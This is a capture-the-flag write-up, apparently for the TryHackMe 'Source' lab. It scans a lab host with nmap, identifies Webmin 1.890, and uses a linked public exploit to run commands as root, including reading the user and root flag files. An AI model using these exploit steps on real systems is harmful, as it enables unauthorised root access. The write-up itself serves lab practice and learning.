CTF : Source

CTF Source writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 11 July 2022

CTF : Source

Informations

  • IP: 10.10.240.116
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p22,10000 -A 10.10.240.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:12 CEST
Nmap scan report for 10.10.240.116
Host is up (0.071s latency).

PORT      STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
|   256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_  256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   37.49 ms 10.9.0.1
2   37.02 ms 10.10.240.116

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.56 seconds

Vulnerabilities search

I assumed MiniServ 1.890 was for Webmin version 1.890.

So search on google and find this exploit : https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py

Well let's try it :)

Exploit

console
$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 id


--------------------------------
   ______________    _____   __
  / ___/_  __/   |  /  _/ | / /
  \__ \ / / / /| |  / //  |/ / 
 ___/ // / / ___ |_/ // /|  /  
/____//_/ /_/  |_/___/_/ |_/   

--------------------------------

WebMin 1.890-expired-remote-root

<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
uid=0(root) gid=0(root) groups=0(root)
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0

It seems to works and it seems that webmin is executed by root... "Ho ! Ho! Ho! It's Christmas !"

console
$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 "ls /home"

$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 "cat /home/xxx/user.txt"

$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 "cat /root/root.txt"

\o/